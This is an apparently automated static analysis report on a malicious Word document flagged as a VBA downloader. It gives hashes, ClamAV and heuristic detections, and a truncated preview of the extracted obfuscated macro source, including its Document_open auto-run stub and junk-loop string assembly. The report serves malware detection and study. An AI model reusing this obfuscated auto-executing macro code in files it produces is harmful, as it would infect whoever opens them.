Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b260a324f1d3b613…

MALICIOUS

Office (OLE)

Size: 248.0 KB
Created: 2020-01-15 19:43:00
Authoring application: Microsoft Office Word
First seen: 2020-09-24
MD5: 657c45ade4303bb41097337af74f446f
SHA-1: f4bc5c8995e3e799fa130fba23314f2f95050c6b
SHA-256: b260a324f1d3b6135a4c52889fb0a4e436ddd6adb6ce61c380b25b33e3a05b80
Risk Score: 202

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The file is an Office document containing VBA macros, specifically a Document_Open macro that is designed to execute automatically. The presence of GetObject calls and p-code auto-execution further indicates malicious intent. While the script is heavily obfuscated, the overall pattern suggests it's a downloader for a second-stage payload, a common tactic for initial access via spearphishing attachments.

Heuristics (6)

  • ClamAV: Doc.Malware.Chartres-7540597-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Malware.Chartres-7540597-0
  • VBA macros detected [medium, 3 related findings, OLE_VBA_MACROS]
    Document contains VBA macro code
  • Document_Open macro [high, OLE_VBA_DOCOPEN]
    Document_Open macro
  • GetObject call [high, OLE_VBA_GETOBJ]
    GetObject call
  • VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10927 bytes
SHA-256: 4f593d96537e091d0745d7e2991815e78721cebe69ac3e94d9f75187737e5cc4
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Hfbzjnjgqdcc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Lxtmyibaoy
End Sub

Attribute VB_Name = "Lyqlryfqs"
Attribute VB_Base = "0{54F4C79B-C307-4900-A9B5-9AB5BED6FD13}{5DC59947-6AAE-4674-AD4D-B24CD2FAB106}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Osnvvfzjmhlpi"
Function Ysukmglx()
   Do While Zydlyneekt = 24
      Loop
            Do While Pcgwboinuj = 2
            Szeplxijaq = Sgn(3)
            Evamykyslspdn = CByte(Thprpgstyjptn + Lzlhrgowpklaz)
      Loop
      Do While Acaxpblybs = 63
            Ccjrlimh = Cos(234 + CStr(324))
      Loop
            Do While Fttflzhdfsuo = 5555
            Spuwaakpfe = Fsasmsuiwhek
            Rxmthnswzv = 234
      Loop
            Do While Hphqnotruod = 2
            Cubpklkgo = CDbl(4)
            Clxybjteew = Int(1)
      Loop
            Do While Agtpqyrct = 1
            Esqgokcjsgv = CInt(Rupkvzjj)
Loop
Jymsjabgerf = ChrW(wdKeyP)
   Do While Bjmzgdypoijok = 24
      Loop
            Do While Yrlzcbevm = 2
            Jdkboiauug = Sgn(3)
            Rxtjkgiqsbwhn = CByte(Vwxnafutuem + Nqybmttc)
      Loop
      Do While Tpdduigdnhuf = 63
            Smsxeyexmhcbc = Cos(234 + CStr(324))
      Loop
            Do While Tolledywbzko = 5555
            Mghsciaavxkmw = Asfkhutjtttup
            Tjdyaaujamvts = 234
      Loop
            Do While Rhvzahfd = 2
            Txoyiokjy = CDbl(4)
            Jxcvgiey = Int(1)
      Loop
            Do While Avsblzpq = 1
            Gjuhdglrykj = CInt(Ahjteuybfh)
Loop
Manlgywi = Jymsjabgerf + Lyqlryfqs.Opfsodhpd + Lyqlryfqs.Ntlvpgiwp
   Do While Vizbsxwved = 24
      Loop
            Do While Mabgtyomi = 2
            Ugqxoulswppy = Sgn(3)
            Vwgxdicfgx = CByte(Ehvebdcpfub + Atloswbbx)
      Loop
      Do While Ipfkqozt = 63
            Qdwsomwkeaugp = Cos(234 + CStr(324))
      Loop
            Do While Rrnbpohjsvl = 5555
            Zqvhtikpovej = Sxhbzdvzxms
            Juexcoelof = 234
      Loop
            Do While Hszcvjrkxo = 2
            Tmuwasipcw = CDbl(4)
            Kybvafdruosl = Int(1)
      Loop
            Do While Ccbgnuisdquik = 1
            Ykkqesxivjrlu = CInt(Uiaeqfnvi)
Loop
Xdkqzbncw = Split(Manlgywi + LTrim(LTrim(Lyqlryfqs.Dardtpwwk. _
Tag)), ",,,,sdf7&&jsad,,,")
   Do While Jxyfufbqolvkg = 24
      Loop
            Do While Iicvjkgdl = 2
            Nysosikxgr = Sgn(3)
            Gykarzctvq = CByte(Qdtwocunilrdx + Mziboxzvxykp)
      Loop
      Do While Dnxuvxponj = 63
            Xzvghcqgqtnop = Cos(234 + CStr(324))
      Loop
            Do While Hvxdnqeextj = 5555
            Dxmyxsaz = Rhyxskzjeug
            Pfqfsuxmxand = 234
      Loop
            Do While Orwariegw = 2
            Muxkehwvewth = CDbl(4)
            Ecetgkuad = Int(1)
      Loop
            Do While Iuozojjbmgaz = 1
            Tqhnkvkjsmga = CInt(Ezlqmswmiwq)
Loop
Ysukmglx = Wljtuuydmaqgq + Join(Xdkqzbncw, "") + Wljtuuydmaqgq
   Do While Oplqlawlqyzx = 24
      Loop
            Do While Vhutvkoof = 2
            Zkjdrhiymomez = Sgn(3)
            Kiyudjiuun = CByte(Uafakbulqm + Rryqsicuviafq)
      Loop
      Do While Mrpppgxox = 63
            Bdfnwxazdlk = Cos(234 + CStr(324))
      Loop
            Do While Llqolzzj = 5555
            Itbxssucajdgz = Mderhuban
            Qicxgfbh = 234
      Loop
            Do While Vzhgjjkhyela = 2
            Wvrsbgsnuobla = CDbl(4)
            Yessnrdx = Int(1)
      Loop
            Do While Krsoysqbdblnj = 1
            Ahftfxjheaz = CInt(Tisxhuqoz)
Loop
End Function
Function Lxtmyibaoy()
a = ",,,,sdf7&&jsad,,,in,,,,sdf7&&jsad,,,,,,
... (truncated)